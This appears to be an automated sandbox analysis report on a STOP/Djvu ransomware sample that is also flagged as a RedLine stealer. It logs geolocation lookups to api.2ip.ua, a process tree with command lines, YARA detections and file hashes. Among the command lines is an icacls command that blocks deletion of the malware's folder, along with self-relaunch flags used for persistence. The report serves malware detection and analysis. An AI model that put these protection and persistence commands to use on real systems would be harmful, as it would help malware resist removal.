                  access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ogbrK9aWxrb%2BK32%2F9WWTZz6x5j%2Bjg3eeLRdm9rsqUxJnWH9NlC3dci1Yel0G3%2FIR%2F3OZ%2FhqNfaf%2Bf%2F%2BE5jD441vjHEST4tGVVgwJseX42nqYKvzVso208QeVPjg6"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a9027a119ae4337-EWR
                  alt-svc: h3=":443"; ma=86400
                  2024-07-26 00:08:22 UTC418INData Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63
                  Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
                  2024-07-26 00:08:22 UTC5INData Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.749709188.114.97.34437336C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  TimestampBytes transferredDirectionData
                  2024-07-26 00:08:25 UTC85OUTGET /geo.json HTTP/1.1
                  User-Agent: Microsoft Internet Explorer
                  Host: api.2ip.ua
                  2024-07-26 00:08:25 UTC889INHTTP/1.1 200 OK
                  Date: Fri, 26 Jul 2024 00:08:25 GMT
                  Content-Type: application/json
                  Transfer-Encoding: chunked
                  Connection: close
                  strict-transport-security: max-age=63072000; preload
                  x-frame-options: SAMEORIGIN
                  x-content-type-options: nosniff
                  x-xss-protection: 1; mode=block; report=...
                  access-control-allow-origin: *
                  access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                  access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9I6yEbr0tJ6i1DGEQHGIH%2B0Zv%2BC3K40VItS1HOt2yuFMvOJUlP3j6w5PSnIcCRyuFDpI%2FjCtjyyEDLXLxGGqDlPuzQOOltr1of7ft9TI3C1EvkEwsorbttE6tBKS"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a9027b6086d7c87-EWR
                  alt-svc: h3=":443"; ma=86400
                  2024-07-26 00:08:25 UTC418INData Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63
                  Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
                  2024-07-26 00:08:25 UTC5INData Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  3192.168.2.749715188.114.97.34437568C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  TimestampBytes transferredDirectionData
                  2024-07-26 00:08:32 UTC85OUTGET /geo.json HTTP/1.1
                  User-Agent: Microsoft Internet Explorer
                  Host: api.2ip.ua
                  2024-07-26 00:08:32 UTC893INHTTP/1.1 200 OK
                  Date: Fri, 26 Jul 2024 00:08:32 GMT
                  Content-Type: application/json
                  Transfer-Encoding: chunked
                  Connection: close
                  strict-transport-security: max-age=63072000; preload
                  x-frame-options: SAMEORIGIN
                  x-content-type-options: nosniff
                  x-xss-protection: 1; mode=block; report=...
                  access-control-allow-origin: *
                  access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                  access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bz3hHwXp7nF%2FeMz7%2BQakmc4r4D8i9mh14i87feBA4qKnXpXRXQ%2BXisyg0LoCdqc8M%2FkrDLbjyYklBorMYMb2Y4mUns1pPYNXntn0OCSi98DsKRojpUtFQBl4UzSv"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a9027e16825433f-EWR
                  alt-svc: h3=":443"; ma=86400
                  2024-07-26 00:08:32 UTC418INData Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63
                  Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
                  2024-07-26 00:08:32 UTC5INData Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  4192.168.2.749725188.114.97.34437756C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  TimestampBytes transferredDirectionData
                  2024-07-26 00:08:40 UTC85OUTGET /geo.json HTTP/1.1
                  User-Agent: Microsoft Internet Explorer
                  Host: api.2ip.ua
                  2024-07-26 00:08:40 UTC891INHTTP/1.1 200 OK
                  Date: Fri, 26 Jul 2024 00:08:40 GMT
                  Content-Type: application/json
                  Transfer-Encoding: chunked
                  Connection: close
                  strict-transport-security: max-age=63072000; preload
                  x-frame-options: SAMEORIGIN
                  x-content-type-options: nosniff
                  x-xss-protection: 1; mode=block; report=...
                  access-control-allow-origin: *
                  access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                  access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=USyx%2B0eXumodeQkhX%2F4gao5qdxSkNEzD9nfSapbOIJn4b7b9qDhE9SXTH3OA8TJZ1B7DUmSVd%2BxlROCV%2BTcgHyfwwvad0neZd44v51cIITLJBCfGgfS2mujhAJ8T"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a902812b90c42b1-EWR
                  alt-svc: h3=":443"; ma=86400
                  2024-07-26 00:08:40 UTC418INData Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63
                  Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
                  2024-07-26 00:08:40 UTC5INData Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  5192.168.2.749726188.114.97.34437820C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  TimestampBytes transferredDirectionData
                  2024-07-26 00:08:40 UTC85OUTGET /geo.json HTTP/1.1
                  User-Agent: Microsoft Internet Explorer
                  Host: api.2ip.ua
                  2024-07-26 00:08:40 UTC895INHTTP/1.1 200 OK
                  Date: Fri, 26 Jul 2024 00:08:40 GMT
                  Content-Type: application/json
                  Transfer-Encoding: chunked
                  Connection: close
                  strict-transport-security: max-age=63072000; preload
                  x-frame-options: SAMEORIGIN
                  x-content-type-options: nosniff
                  x-xss-protection: 1; mode=block; report=...
                  access-control-allow-origin: *
                  access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                  access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qtlbCVkuGVma5HdIq7i%2BNvr66efbC77XfOk5kHZVOkrZJt%2B0bsOf%2Fy%2BsipIgcGyyNaLrH5dT9gSYJYo72XewMw44DyjQCxS%2B0pvLQx9Gk9nEkESGuCvQSF%2F654EU"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a9028153a6c4295-EWR
                  alt-svc: h3=":443"; ma=86400
                  2024-07-26 00:08:40 UTC418INData Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63
                  Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
                  2024-07-26 00:08:40 UTC5INData Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:20:08:14
                  Start date:25/07/2024
                  Path:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe"
                  Imagebase:0x400000
                  File size:810'496 bytes
                  MD5 hash:3A11D47AD1A6093DDFE84E48E77554F3
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1276700726.0000000002153000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                  Reputation:low
                  Has exited:true

                  General

                  Target ID:1
                  Start time:20:08:14
                  Start date:25/07/2024
                  Path:C:\Users\user\AppData\Local\Temp\HhVfIB.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user~1\AppData\Local\Temp\HhVfIB.exe
                  Imagebase:0xd10000
                  File size:15'872 bytes
                  MD5 hash:F7D21DE5C4E81341ECCD280C11DDCC9A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:6
                  Start time:20:08:16
                  Start date:25/07/2024
                  Path:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe"
                  Imagebase:0x400000
                  File size:810'496 bytes
                  MD5 hash:3A11D47AD1A6093DDFE84E48E77554F3
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  Has exited:true

                  General

                  Target ID:8
                  Start time:20:08:18
                  Start date:25/07/2024
                  Path:C:\Windows\SysWOW64\icacls.exe
                  Wow64 process (32bit):true
                  Commandline:icacls "C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                  Imagebase:0x600000
                  File size:29'696 bytes
                  MD5 hash:2E49585E4E08565F52090B144062F97E
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:9
                  Start time:20:08:18
                  Start date:25/07/2024
                  Path:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe" --Admin IsNotAutoStart IsNotTask
                  Imagebase:0x400000
                  File size:810'496 bytes
                  MD5 hash:3A11D47AD1A6093DDFE84E48E77554F3
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000009.00000002.1311439366.0000000002139000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000002.1311595784.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000002.1311595784.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  Has exited:true

                  General

                  Target ID:10
                  Start time:20:08:18
                  Start date:25/07/2024
                  Path:C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe --Task
                  Imagebase:0x400000
                  File size:810'496 bytes
                  MD5 hash:3A11D47AD1A6093DDFE84E48E77554F3
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000A.00000002.1345421470.00000000007B9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000A.00000002.1346549601.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000A.00000002.1346549601.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  Antivirus matches:
                  • Detection: 96%, ReversingLabs
                  Has exited:true

                  General

                  Target ID:12
                  Start time:20:08:19
                  Start date:25/07/2024
                  Path:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe" --Admin IsNotAutoStart IsNotTask
                  Imagebase:0x400000
                  File size:810'496 bytes
                  MD5 hash:3A11D47AD1A6093DDFE84E48E77554F3
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000C.00000002.2512789559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000C.00000002.2512789559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000C.00000002.2512789559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  Has exited:false

                  General

                  Target ID:15
                  Start time:20:08:20
                  Start date:25/07/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1572
                  Imagebase:0x6c0000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:22
                  Start time:20:08:22
                  Start date:25/07/2024
                  Path:C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe --Task
                  Imagebase:0x400000
                  File size:810'496 bytes
                  MD5 hash:3A11D47AD1A6093DDFE84E48E77554F3
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000016.00000002.2512068872.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000016.00000002.2512068872.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000016.00000002.2512068872.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  Has exited:false

                  General

                  Target ID:24
                  Start time:20:08:29
                  Start date:25/07/2024
                  Path:C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe" --AutoStart
                  Imagebase:0x400000
                  File size:810'496 bytes
                  MD5 hash:3A11D47AD1A6093DDFE84E48E77554F3
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000018.00000002.1411881019.00000000021C0000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000018.00000002.1411953479.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000018.00000002.1411953479.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  Has exited:true

                  General

                  Target ID:25
                  Start time:20:08:30
                  Start date:25/07/2024
                  Path:C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe" --AutoStart
                  Imagebase:0x400000
                  File size:810'496 bytes
                  MD5 hash:3A11D47AD1A6093DDFE84E48E77554F3
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000019.00000002.1425109003.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000019.00000002.1425109003.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000019.00000002.1425109003.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  Has exited:true

                  General

                  Target ID:27
                  Start time:21:35:54
                  Start date:25/07/2024
                  Path:C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe --Task
                  Imagebase:0x400000
                  File size:810'496 bytes
                  MD5 hash:3A11D47AD1A6093DDFE84E48E77554F3
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001B.00000002.1495269240.0000000002121000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001B.00000002.1495333851.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001B.00000002.1495333851.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  Has exited:true

                  General

                  Target ID:28
                  Start time:21:35:55
                  Start date:25/07/2024
                  Path:C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe --Task
                  Imagebase:0x400000
                  File size:810'496 bytes
                  MD5 hash:3A11D47AD1A6093DDFE84E48E77554F3
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001C.00000002.1504362031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001C.00000002.1504362031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000001C.00000002.1504362031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  Has exited:true

                  General

                  Target ID:29
                  Start time:21:35:55
                  Start date:25/07/2024
                  Path:C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe" --AutoStart
                  Imagebase:0x400000
                  File size:810'496 bytes
                  MD5 hash:3A11D47AD1A6093DDFE84E48E77554F3
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
